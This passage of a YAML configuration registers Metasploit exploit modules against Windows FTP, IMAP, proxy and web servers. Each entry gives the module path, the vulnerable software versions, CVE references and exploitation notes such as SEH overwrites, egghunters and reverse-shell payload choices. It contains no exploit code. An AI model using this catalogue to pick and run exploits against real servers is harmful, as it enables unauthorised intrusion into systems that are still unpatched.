v3.55.0.05 ftp client.\n\ + \t\t\t\tWhen processing the response on a PWD command, a stack based buffer overflow occurs.\n\ + \t\t\t\tThis leads to arbitrary code execution when a structured exception handler gets\n\ + \t\t\t\toverwritten.\n\ + \t\t\t" + authors: + - - OSVDB + - "68638" + - - URL + - http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/ + path: extensions/metasploit/ + class: Msf_module +msf_netterm_netftpd_user: + enable: true + msf: true + msf_key: windows/ftp/netterm_netftpd_user + name: NetTerm NetFTPD USER Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a vulnerability in the NetTerm NetFTPD\n\ + \t\t\t\tapplication. This package is part of the NetTerm package.\n\ + \t\t\t\tThis module uses the USER command to trigger the overflow.\n\ + \t\t\t" + authors: + - - CVE + - 2005-1323 + - - OSVDB + - "15865" + - - URL + - http://seclists.org/lists/fulldisclosure/2005/Apr/0578.html + - - BID + - "13396" + path: extensions/metasploit/ + class: Msf_module +msf_freeftpd_user: + enable: true + msf: true + msf_key: windows/ftp/freeftpd_user + name: freeFTPd 1.0 Username Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in the freeFTPd\n\ + \t\t\t\tmulti-protocol file transfer service. This flaw can only be\n\ + \t\t\t\texploited when logging has been enabled (non-default).\n\ + \t\t\t" + authors: + - - CVE + - 2005-3683 + - - OSVDB + - "20909" + - - BID + - "15457" + - - URL + - http://lists.grok.org.uk/pipermail/full-disclosure/2005-November/038808.html + path: extensions/metasploit/ + class: Msf_module +msf_servu_mdtm: + enable: true + msf: true + msf_key: windows/ftp/servu_mdtm + name: Serv-U FTPD MDTM Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis is an exploit for the Serv-U\\'s MDTM command timezone\n\ + \t\t\t\toverflow. It has been heavily tested against versions\n\ + \t\t\t\t4.0.0.4/4.1.0.0/4.1.0.3/5.0.0.0 with success against\n\ + \t\t\t\tnt4/2k/xp/2k3. I have also had success against version 3,\n\ + \t\t\t\tbut only tested 1 version/os. The bug is in all versions\n\ + \t\t\t\tprior to 5.0.0.4, but this exploit will not work against\n\ + \t\t\t\tversions not listed above. You only get one shot, but it\n\ + \t\t\t\tshould be OS/SP independent.\n\n\ + \t\t\t\tThis exploit is a single hit, the service dies after the\n\ + \t\t\t\tshellcode finishes execution.\n\ + \t\t\t" + authors: + - - CVE + - 2004-0330 + - - OSVDB + - "4073" + - - URL + - http://archives.neohapsis.com/archives/bugtraq/2004-02/0654.html + - - URL + - http://www.cnhonker.com/advisory/serv-u.mdtm.txt + - - URL + - http://www.cnhonker.com/index.php?module=releases&act=view&type=3&id=54 + - - BID + - "9751" + path: extensions/metasploit/ + class: Msf_module +msf_mercur_imap_select_overflow: + enable: true + msf: true + msf_key: windows/imap/mercur_imap_select_overflow + name: Mercur v5.0 IMAP SP3 SELECT Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tMercur v5.0 IMAP server is prone to a remotely exploitable\n\ + \t\t\t\tstack-based buffer overflow vulnerability. This issue is due\n\ + \t\t\t\tto a failure of the application to properly bounds check\n\ + \t\t\t\tuser-supplied data prior to copying it to a fixed size memory buffer.\n\ + \t\t\t\tCredit to Tim Taylor for discover the vulnerability.\n\ + \t\t\t" + authors: + - - CVE + - 2006-1255 + - - OSVDB + - "23950" + - - BID + - "17138" + path: extensions/metasploit/ + class: Msf_module +msf_eudora_list: + enable: true + msf: true + msf_key: windows/imap/eudora_list + name: Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits a stack buffer overflow in the Qualcomm WorldMail IMAP Server\n\ + \t\t\t\tversion 3.0 (builds 6.1.19.0 through 6.1.22.0). Version 6.1.22.1 fixes this\n\ + \t\t\t\tparticular vulnerability.\n\n\ + \t\t\t\tNOTE: The service does NOT restart automatically by default. You may be limited to\n\ + \t\t\t\tonly one attempt, so choose wisely!\n\ + \t\t\t" + authors: + - - CVE + - 2005-4267 + - - OSVDB + - "22097" + - - BID + - "15980" + path: extensions/metasploit/ + class: Msf_module +msf_mailenable_w3c_select: + enable: true + msf: true + msf_key: windows/imap/mailenable_w3c_select + name: MailEnable IMAPD W3C Logging Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in the W3C logging\n\ + \t\t\t\tfunctionality of the MailEnable IMAPD service. Logging is\n\ + \t\t\t\tnot enabled by default and this exploit requires a valid\n\ + \t\t\t\tusername and password to exploit the flaw. MailEnable\n\ + \t\t\t\tProfessional version 1.6 and prior and MailEnable Enterprise\n\ + \t\t\t\tversion 1.1 and prior are affected.\n\ + \t\t\t" + authors: + - - CVE + - 2005-3155 + - - OSVDB + - "19842" + - - BID + - "15006" + path: extensions/metasploit/ + class: Msf_module +msf_mdaemon_fetch: + enable: true + msf: true + msf_key: windows/imap/mdaemon_fetch + name: MDaemon 9.6.4 IMAPD FETCH Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in the Alt-N MDaemon IMAP Server\n\ + \t\t\t\tversion 9.6.4 by sending an overly long FETCH BODY command. Valid IMAP\n\ + \t\t\t\taccount credentials are required. Credit to Matteo Memelli\n\ + \t\t\t" + authors: + - - CVE + - 2008-1358 + - - OSVDB + - "43111" + - - BID + - "28245" + - - URL + - http://www.milw0rm.com/exploits/5248 + path: extensions/metasploit/ + class: Msf_module +msf_novell_netmail_subscribe: + enable: true + msf: true + msf_key: windows/imap/novell_netmail_subscribe + name: Novell NetMail <= 3.52d IMAP SUBSCRIBE Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Novell's NetMail 3.52 IMAP SUBSCRIBE\n\ + \t\t\t\tverb. By sending an overly long string, an attacker can overwrite the\n\ + \t\t\t\tbuffer and control program execution.\n\ + \t\t\t" + authors: + - - CVE + - 2006-6761 + - - OSVDB + - "31360" + - - BID + - "21728" + - - URL + - http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=454 + path: extensions/metasploit/ + class: Msf_module +msf_novell_netmail_auth: + enable: true + msf: true + msf_key: windows/imap/novell_netmail_auth + name: Novell NetMail <=3.52d IMAP AUTHENTICATE Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Novell's NetMail 3.52 IMAP AUTHENTICATE\n\ + \t\t\t\tGSSAPI command. By sending an overly long string, an attacker can overwrite the\n\ + \t\t\t\tbuffer and control program execution. Using the PAYLOAD of windows/shell_bind_tcp\n\ + \t\t\t\tor windows/shell_reverse_tcp allows for the most reliable results.\n\ + \t\t\t" + authors: + - - OSVDB + - "55175" + - - URL + - http://www.w00t-shell.net/# + path: extensions/metasploit/ + class: Msf_module +msf_mailenable_status: + enable: true + msf: true + msf_key: windows/imap/mailenable_status + name: MailEnable IMAPD (1.54) STATUS Request Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tMailEnable's IMAP server contains a buffer overflow\n\ + \t\t\t\tvulnerability in the STATUS command. With proper\n\ + \t\t\t\tcredentials, this could allow for the execution of arbitrary\n\ + \t\t\t\tcode.\n\ + \t\t\t" + authors: + - - CVE + - 2005-2278 + - - OSVDB + - "17844" + - - BID + - "14243" + - - NSS + - "19193" + path: extensions/metasploit/ + class: Msf_module +msf_mdaemon_cram_md5: + enable: true + msf: true + msf_key: windows/imap/mdaemon_cram_md5 + name: Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in the CRAM-MD5\n\ + \t\t\t\tauthentication of the MDaemon IMAP service. This\n\ + \t\t\t\tvulnerability was discovered by Muts.\n\ + \t\t\t" + authors: + - - CVE + - 2004-1520 + - - OSVDB + - "11838" + - - BID + - "11675" + path: extensions/metasploit/ + class: Msf_module +msf_novell_netmail_status: + enable: true + msf: true + msf_key: windows/imap/novell_netmail_status + name: Novell NetMail <= 3.52d IMAP STATUS Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Novell's Netmail 3.52 IMAP STATUS\n\ + \t\t\t\tverb. By sending an overly long string, an attacker can overwrite the\n\ + \t\t\t\tbuffer and control program execution.\n\ + \t\t\t" + authors: + - - CVE + - 2005-3314 + - - OSVDB + - "20956" + - - BID + - "15491" + path: extensions/metasploit/ + class: Msf_module +msf_mercury_login: + enable: true + msf: true + msf_key: windows/imap/mercury_login + name: Mercury/32 <= 4.01b LOGIN Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits a stack buffer overflow in Mercury/32 <= 4.01b IMAPD\n\ + \t\t\t\tLOGIN verb. By sending a specially crafted login command, a buffer\n\ + \t\t\t\tis corrupted, and code execution is possible. This vulnerability was\n\ + \t\t\t\tdiscovered by (mu-b at digit-labs.org).\n\ + \t\t\t" + authors: + - - CVE + - 2007-1373 + - - OSVDB + - "33883" + path: extensions/metasploit/ + class: Msf_module +msf_mailenable_login: + enable: true + msf: true + msf_key: windows/imap/mailenable_login + name: MailEnable IMAPD (2.34/2.35) Login Request Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tMailEnable's IMAP server contains a buffer overflow\n\ + \t\t\t\tvulnerability in the Login command.\n\ + \t\t\t" + authors: + - - CVE + - 2006-6423 + - - OSVDB + - "32125" + - - BID + - "21492" + - - URL + - http://lists.grok.org.uk/pipermail/full-disclosure/2006-December/051229.html + path: extensions/metasploit/ + class: Msf_module +msf_ipswitch_search: + enable: true + msf: true + msf_key: windows/imap/ipswitch_search + name: Ipswitch IMail IMAP SEARCH Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Ipswitch IMail Server 2006.1 IMAP SEARCH\n\ + \t\t\t\tverb. By sending an overly long string, an attacker can overwrite the\n\ + \t\t\t\tbuffer and control program execution.\n\ + \t\t\t\tIn order for this module to be successful, the IMAP user must have at least one\n\ + \t\t\t\tmessage.\n\ + \t\t\t" + authors: + - - CVE + - 2007-3925 + - - OSVDB + - "36219" + - - BID + - "24962" + path: extensions/metasploit/ + class: Msf_module +msf_mercury_rename: + enable: true + msf: true + msf_key: windows/imap/mercury_rename + name: Mercury/32 v4.01a IMAP RENAME Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow vulnerability in the\n\ + \t\t\t\tMercury/32 v.4.01a IMAP service.\n\ + \t\t\t" + authors: + - - CVE + - 2004-1211 + - - OSVDB + - "12508" + - - BID + - "11775" + - - NSS + - "15867" + path: extensions/metasploit/ + class: Msf_module +msf_novell_netmail_append: + enable: true + msf: true + msf_key: windows/imap/novell_netmail_append + name: Novell NetMail <= 3.52d IMAP APPEND Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Novell's Netmail 3.52 IMAP APPEND\n\ + \t\t\t\tverb. By sending an overly long string, an attacker can overwrite the\n\ + \t\t\t\tbuffer and control program execution.\n\ + \t\t\t" + authors: + - - CVE + - 2006-6425 + - - OSVDB + - "31362" + - - BID + - "21723" + - - URL + - http://www.zerodayinitiative.com/advisories/ZDI-06-054.html + path: extensions/metasploit/ + class: Msf_module +msf_mercur_login: + enable: true + msf: true + msf_key: windows/imap/mercur_login + name: Mercur Messaging 2005 IMAP Login Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Atrium Mercur IMAP 5.0 SP3.\n\ + \t\t\t\tSince the room for shellcode is small, using the reverse ordinal payloads\n\ + \t\t\t\tyields the best results.\n\ + \t\t\t" + authors: + - - CVE + - 2006-1255 + - - OSVDB + - "23950" + - - BID + - "17138" + - - URL + - http://archives.neohapsis.com/archives/fulldisclosure/2006-03/1104.html + path: extensions/metasploit/ + class: Msf_module +msf_imail_delete: + enable: true + msf: true + msf_key: windows/imap/imail_delete + name: IMail IMAP4D Delete Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in the 'DELETE'\n\ + \t\t\t\tcommand of the the IMail IMAP4D service. This vulnerability\n\ + \t\t\t\tcan only be exploited with a valid username and password.\n\ + \t\t\t\tThis flaw was patched in version 8.14.\n\ + \t\t\t" + authors: + - - CVE + - 2004-1520 + - - OSVDB + - "11838" + - - BID + - "11675" + path: extensions/metasploit/ + class: Msf_module +msf_ccproxy_telnet_ping: + enable: true + msf: true + msf_key: windows/proxy/ccproxy_telnet_ping + name: CCProxy <= v6.2 Telnet Proxy Ping Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits the YoungZSoft CCProxy <= v6.2 suite\n\ + \t\t\t\tTelnet service. The stack is overwritten when sending an overly\n\ + \t\t\t\tlong address to the 'ping' command.\n\ + \t\t\t" + authors: + - - CVE + - 2004-2416 + - - OSVDB + - "11593" + - - BID + - "11666 " + - - URL + - http://milw0rm.com/exploits/621 + path: extensions/metasploit/ + class: Msf_module +msf_qbik_wingate_wwwproxy: + enable: true + msf: true + msf_key: windows/proxy/qbik_wingate_wwwproxy + name: Qbik WinGate WWW Proxy Server URL Processing Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Qbik WinGate version\n\ + \t\t\t\t6.1.1.1077 and earlier. By sending malformed HTTP POST URL to the\n\ + \t\t\t\tHTTP proxy service on port 80, a remote attacker could overflow\n\ + \t\t\t\ta buffer and execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2006-2926 + - - OSVDB + - "26214" + - - BID + - "18312" + path: extensions/metasploit/ + class: Msf_module +msf_proxypro_http_get: + enable: true + msf: true + msf_key: windows/proxy/proxypro_http_get + name: Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Proxy-Pro Professional\n\ + \t\t\t\tGateKeeper 4.7. By sending a long HTTP GET to the default port\n\ + \t\t\t\tof 3128, a remote attacker could overflow a buffer and execute\n\ + \t\t\t\tarbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2004-0326 + - - OSVDB + - "4027" + - - BID + - "9716" + path: extensions/metasploit/ + class: Msf_module +msf_bluecoat_winproxy_host: + enable: true + msf: true + msf_key: windows/proxy/bluecoat_winproxy_host + name: Blue Coat WinProxy Host Header Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in the Blue Coat Systems WinProxy\n\ + \t\t\t\tservice by sending a long port value for the Host header in a HTTP\n\ + \t\t\t\trequest.\n\ + \t\t\t" + authors: + - - CVE + - 2005-4085 + - - OSVDB + - "22238" + - - BID + - "16147" + - - URL + - http://www.bluecoat.com/support/knowledge/advisory_host_header_stack_overflow.html + path: extensions/metasploit/ + class: Msf_module +msf_maxdb_webdbm_get_overflow: + enable: true + msf: true + msf_key: windows/http/maxdb_webdbm_get_overflow + name: MaxDB WebDBM GET Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in the MaxDB WebDBM\n\ + \t\t\t\tservice. This service is included with many recent versions\n\ + \t\t\t\tof the MaxDB and SAPDB products. This particular module is\n\ + \t\t\t\tcapable of exploiting Windows systems through the use of an\n\ + \t\t\t\tSEH frame overwrite. The offset to the SEH frame may change\n\ + \t\t\t\tdepending on where MaxDB has been installed, this module\n\ + \t\t\t\tassumes a web root path with the same length as:\n\n\ + \t\t\t\tC:\\Program Files\\sdb\\programs\\web\\Documents\n\ + \t\t\t" + authors: + - - CVE + - 2005-0684 + - - OSVDB + - "15816" + - - URL + - http://www.idefense.com/application/poi/display?id=234&type=vulnerabilities + - - BID + - "13368" + path: extensions/metasploit/ + class: Msf_module +msf_servu_session_cookie: + enable: true + msf: true + msf_key: windows/http/servu_session_cookie + name: Rhinosoft Serv-U Session Cookie Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in Rhinosoft Serv-U 9.0.0.5.\n\ + \t\t\t\tSending a specially crafted POST request with an overly long session cookie\n\ + \t\t\t\tstring, an attacker may be able to execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2009-4006 + - - OSVDB + - "59772" + - - URL + - http://rangos.de/ServU-ADV.txt + - - URL + - http://lists.grok.org.uk/pipermail/full-disclosure/2009-November/071370.html + path: extensions/metasploit/ + class: Msf_module +msf_trackercam_phparg_overflow: + enable: true + msf: true + msf_key: windows/http/trackercam_phparg_overflow + name: TrackerCam PHP Argument Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a simple stack buffer overflow in the\n\ + \t\t\t\tTrackerCam web server. All current versions of this software\n\ + \t\t\t\tare vulnerable to a large number of security issues. This\n\ + \t\t\t\tmodule abuses the directory traversal flaw to gain\n\ + \t\t\t\tinformation about the system and then uses the PHP overflow\n\ + \t\t\t\tto execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2005-0478 + - - OSVDB + - "13953" + - - OSVDB + - "13955" + - - BID + - "12592" + - - URL + - http://aluigi.altervista.org/adv/tcambof-adv.txt + path: extensions/metasploit/ + class: Msf_module +msf_maxdb_webdbm_database: + enable: true + msf: true + msf_key: windows/http/maxdb_webdbm_database + name: MaxDB WebDBM Database Parameter Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in the MaxDB WebDBM\n\ + \t\t\t\tservice. By sending a specially-crafted HTTP request that contains\n\ + \t\t\t\tan overly long database name. A remote attacker could overflow a buffer\n\ + \t\t\t\tand execute arbitrary code on the system with privileges of the wahttp process.\n\n\ + \t\t\t\tThis module has been tested against MaxDB 7.6.00.16 and MaxDB 7.6.00.27.\n\ + \t\t\t" + authors: + - - CVE + - 2006-4305 + - - OSVDB + - "28300" + - - BID + - "19660" + path: extensions/metasploit/ + class: Msf_module +msf_zenworks_uploadservlet: + enable: true + msf: true + msf_key: windows/http/zenworks_uploadservlet + name: Novell ZENworks Configuration Management Remote Execution + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a code execution flaw in Novell ZENworks Configuration Management 10.2.0.\n\ + \t\t\t\tBy exploiting the UploadServlet, an attacker can upload a malicious file outside of the TEMP directory\n\ + \t\t\t\tand then make a secondary request that allows for arbitrary code execution.\n\ + \t\t\t" + authors: + - - OSVDB + - "63412" + - - BID + - "39114" + - - URL + - http://www.zerodayinitiative.com/advisories/ZDI-10-078/ + - - URL + - http://tucanalamigo.blogspot.com/2010/04/pdc-de-zdi-10-078.html + path: extensions/metasploit/ + class: Msf_module +msf_mdaemon_worldclient_form2raw: + enable: true + msf: true + msf_key: windows/http/mdaemon_worldclient_form2raw + name: MDaemon <= 6.8.5 WorldClient form2raw.cgi Stack Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\tThis module exploits a stack buffer overflow in Alt-N MDaemon SMTP server for\n\ + \t\t\tversions 6.8.5 and earlier. When WorldClient HTTP server is installed (default),\n\ + \t\t\ta CGI script is provided to accept html FORM based emails and deliver via MDaemon.exe,\n\ + \t\t\tby writing the CGI output to the Raw Queue. When X-FromCheck is enabled (also default),\n\ + \t\t\tthe temporary form2raw.cgi data is copied by MDaemon.exe and a stack based\n\ + \t\t\toverflow occurs when an excessively long From field is specified.\n\ + \t\t\tThe RawQueue is processed every 1 minute by default, to a maximum of 60 minutes.\n\ + \t\t\tKeep this in mind when choosing payloads or setting WfsDelay... You'll need to wait.\n\n\ + \t\t\tFurthermore, this exploit uses a direct memory jump into a nopsled (which isn't very\n\ + \t\t\treliable). Once the payload is written into the Raw Queue by Form2Raw, MDaemon will\n\ + \t\t\tcontinue to crash/execute the payload until the CGI output is manually deleted\n\ + \t\t\tfrom the queue in C:\\MDaemon\\RawFiles\\*.raw.\n\ + \t\t\t" + authors: + - - CVE + - 2003-1200 + - - OSVDB + - "3255" + - - BID + - "9317" + path: extensions/metasploit/ + class: Msf_module +msf_hp_nnm_snmp: + enable: true + msf: true + msf_key: windows/http/hp_nnm_snmp + name: HP OpenView Network Node Manager Snmp.exe CGI Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50.\n\ + \t\t\t\t\tBy sending a specially crafted CGI request to Snmp.exe, an attacker may be able to execute\n\ + \t\t\t\t\tarbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2009-3849 + - - OSVDB + - "60933" + path: extensions/metasploit/ + class: Msf_module +msf_hp_nnm_getnnmdata_icount: + enable: true + msf: true + msf_key: windows/http/hp_nnm_getnnmdata_icount + name: HP OpenView Network Node Manager getnnmdata.exe (ICount) CGI Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53.\n\ + \t\t\t\tBy sending specially crafted ICount parameter to the getnnmdata.exe CGI,\n\ + \t\t\t\tan attacker may be able to execute arbitrary code.\n\ + \t\t\t" + authors: + - - CVE + - 2010-1554 + - - OSVDB + - "64976" + path: extensions/metasploit/ + class: Msf_module +msf_easyftp_list: + enable: true + msf: true + msf_key: windows/http/easyftp_list + name: EasyFTP Server <= 1.7.0.11 list.html path Stack Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11\n\ + \t\t\t\tand earlier. EasyFTP fails to check input size when parsing the 'path' parameter\n\ + \t\t\t\tsupplied to an HTTP GET request, which leads to a stack based buffer overflow.\n\ + \t\t\t\tEasyFTP allows anonymous access by default; valid credentials are typically\n\ + \t\t\t\tunnecessary to exploit this vulnerability.\n\n\ + \t\t\t\tAfter version 1.7.0.12, this package was renamed \"UplusFtp\".\n\n\ + \t\t\t\tDue to limited space, as well as difficulties using an egghunter, the use of\n\ + \t\t\t\tstaged, ORD, and/or shell payloads is recommended.\n\ + \t\t\t" + authors: + - - OSVDB + - "66614" + - - URL + - http://www.exploit-db.com/exploits/11500/ + path: extensions/metasploit/ + class: Msf_module +msf_novell_messenger_acceptlang: + enable: true + msf: true + msf_key: windows/http/novell_messenger_acceptlang + name: Novell Messenger Server 2.0 Accept-Language Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Novell GroupWise\n\ + \t\t\t\tMessenger Server v2.0. This flaw is triggered by any HTTP\n\ + \t\t\t\trequest with an Accept-Language header greater than 16 bytes.\n\ + \t\t\t\tTo overwrite the return address on the stack, we must first\n\ + \t\t\t\tpass a memcpy() operation that uses pointers we supply. Due to the\n\ + \t\t\t\tlarge list of restricted characters and the limitations of the current\n\ + \t\t\t\tencoder modules, very few payloads are usable.\n\ + \t\t\t" + authors: + - - CVE + - 2006-0992 + - - OSVDB + - "24617" + - - BID + - "17503" + path: extensions/metasploit/ + class: Msf_module +msf_savant_31_overflow: + enable: true + msf: true + msf_key: windows/http/savant_31_overflow + name: Savant 3.1 Web Server Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Savant 3.1 Web Server. The service\n\ + \t\t\t\tsupports a maximum of 10 threads (for a default install). Each exploit attempt\n\ + \t\t\t\tgenerally causes a thread to die whether sucessful or not. Therefore, in a default\n\ + \t\t\t\tconfiguration, you only have 10 chances.\n\n\ + \t\t\t\tDue to the limited space available for the payload in this exploit module, use of the\n\ + \t\t\t\t\"ord\" payloads is recommended.\n\ + \t\t\t" + authors: + - - CVE + - 2002-1120 + - - OSVDB + - "9829" + - - BID + - "5686" + - - URL + - http://www.milw0rm.com/exploits/787 + path: extensions/metasploit/ + class: Msf_module +msf_ipswitch_wug_maincfgret: + enable: true + msf: true + msf_key: windows/http/ipswitch_wug_maincfgret + name: Ipswitch WhatsUp Gold 8.03 Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a buffer overflow in IPswitch WhatsUp Gold 8.03. By\n\ + \t\t\t\tposting a long string for the value of 'instancename' in the _maincfgret.cgi\n\ + \t\t\t\tscript an attacker can overflow a buffer and execute arbitrary code on the system.\n\ + \t\t\t" + authors: + - - CVE + - 2004-0798 + - - OSVDB + - "9177" + - - BID + - "11043" + path: extensions/metasploit/ + class: Msf_module +msf_xitami_if_mod_since: + enable: true + msf: true + msf_key: windows/http/xitami_if_mod_since + name: Xitami 2.5c2 Web Server If-Modified-Since Overflow + category: Metasploit + description: "\n\ + \t\t\t\tThis module exploits a stack buffer overflow in the iMatix Corporation\n\ + \t\t\t\tXitami Web Server. If a malicious user sends an\tIf-Modified-Since\n\ + \t\t\t\theader containing an overly long string, it may be possible to\n\ + \t\t\t\texecute a payload remotely. Due to size constraints, this module uses\n\ + \t\t\t\tthe Egghunter technique.\n\ + \t\t\t" + authors: + - - CVE + - 2007-5067 + - - OSVDB + - "40594" + - - OSVDB + - "40595" + - - BID + - "25772" + - - URL + - http://www.milw0rm.com/exploits/4450 + path: extensions/metasploit/ + class: Msf_module +msf_ia_webmail: + enable: true + msf: true + msf_key: windows/http/ia_webmail + name: IA WebMail 3.x Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis exploits a stack buffer overflow in the IA WebMail server.\n\ + \t\t\t\tThis exploit has not been tested against a live system at\n\ + \t\t\t\tthis time.\n\ + \t\t\t" + authors: + - - CVE + - 2003-1192 + - - OSVDB + - "2757" + - - BID + - "8965" + - - URL + - http://www.k-otik.net/exploits/11.19.iawebmail.pl.php + path: extensions/metasploit/ + class: Msf_module +msf_hp_nnm_ovas: + enable: true + msf: true + msf_key: windows/http/hp_nnm_ovas + name: HP OpenView NNM 7.53, 7.51 OVAS.EXE Pre-Authentication Stack Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in HP OpenView Network Node Manager versions 7.53 and earlier.\n\ + \t\t\t\tSpecifically this vulnerability is caused by a failure to properly handle user supplied input within the\n\ + \t\t\t\tHTTP request including headers and the actual URL GET request.\n\n\ + \t\t\t\tExploitation is tricky due to character restrictions. It was necessary to utilize a egghunter shellcode\n\ + \t\t\t\twhich was alphanumeric encoded by muts in the original exploit.\n\n\ + \t\t\t\tIf you plan on using exploit this for a remote shell, you will likely want to migrate to a different process\n\ + \t\t\t\tas soon as possible. Any connections get reset after a short period of time. This is probably some timeout\n\ + \t\t\t\thandling code that causes this.\n\ + \t\t\t" + authors: + - - CVE + - 2008-1697 + - - OSVDB + - "43992" + - - BID + - "28569" + path: extensions/metasploit/ + class: Msf_module +msf_sybase_easerver: + enable: true + msf: true + msf_key: windows/http/sybase_easerver + name: Sybase EAServer 5.2 Remote Stack Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in the Sybase EAServer Web\n\ + \t\t\t\tConsole. The offset to the SEH frame appears to change depending\n\ + \t\t\t\ton what version of Java is in use by the remote server, making this\n\ + \t\t\t\texploit somewhat unreliable.\n\ + \t\t\t" + authors: + - - CVE + - 2005-2297 + - - OSVDB + - "17996" + - - BID + - "14287" + path: extensions/metasploit/ + class: Msf_module +msf_privatewire_gateway: + enable: true + msf: true + msf_key: windows/http/privatewire_gateway + name: Private Wire Gateway Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis exploits a buffer overflow in the ADMCREG.EXE used\n\ + \t\t\t\tin the PrivateWire Online Registration Facility.\n\ + \t\t\t" + authors: + - - CVE + - 2006-3252 + - - OSVDB + - "26861" + - - BID + - "18647" + path: extensions/metasploit/ + class: Msf_module +msf_belkin_bulldog: + enable: true + msf: true + msf_key: windows/http/belkin_bulldog + name: Belkin Bulldog Plus Web Service Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in Belkin Bulldog Plus\n\ + \t\t\t\t4.0.2 build 1219. When sending a specially crafted http request,\n\ + \t\t\t\tan attacker may be able to execute arbitrary code.\n\ + \t\t\t" + authors: + - - OSVDB + - "54395" + - - BID + - "34033" + path: extensions/metasploit/ + class: Msf_module +msf_shoutcast_format: + enable: true + msf: true + msf_key: windows/http/shoutcast_format + name: SHOUTcast DNAS/win32 1.9.4 File Request Format String Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a format string vulnerability in the\n\ + \t\t\t\tNullsoft SHOUTcast server for Windows. The vulnerability is\n\ + \t\t\t\ttriggered by requesting a file path that contains format\n\ + \t\t\t\tstring specifiers. This vulnerability was discovered by\n\ + \t\t\t\tTomasz Trojanowski and Damian Put.\n\ + \t\t\t" + authors: + - - CVE + - 2004-1373 + - - OSVDB + - "12585" + - - BID + - "12096" + path: extensions/metasploit/ + class: Msf_module +msf_hp_nnm_webappmon_ovjavalocale: + enable: true + msf: true + msf_key: windows/http/hp_nnm_webappmon_ovjavalocale + name: HP NNM CGI webappmon.exe OvJavaLocale Buffer Overflow + category: Metasploit + description: "\n\ + \t\t\t\t\tThis module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.53.\n\ + \t\t\t\tBy sending a request continaing a cookie longer than 5120 bytes, an attacker can overflow\n\ + \t\t\t\ta stack buffer and execute arbitrary code.\n\n\ + \t\t\t\tThe vulnerable code is within the OvWwwDebug function. The static-sized stack buffer is\n\ + \t\t\t\tdeclared within this function. When the vulnerability is triggered, the stack trace looks\n\ + \t\t\t\tlike the following:\n\n\ + \t\t\t\t\t#0 ...\n\ + \t\t\t\t\t#1 sprintf_new(local_stack_buf, fmt, cooke);\n\ + \t\t\t\t\t#2 OvWwwDebug(\" HTTP_COOKIE=%s\\n\", cookie);\n\ + \t\t\t\t\t#3 ?OvWwwInit@@YAXAAHQAPADPBD@Z(x, x, x);\n\ + \t\t\t\t\t#4 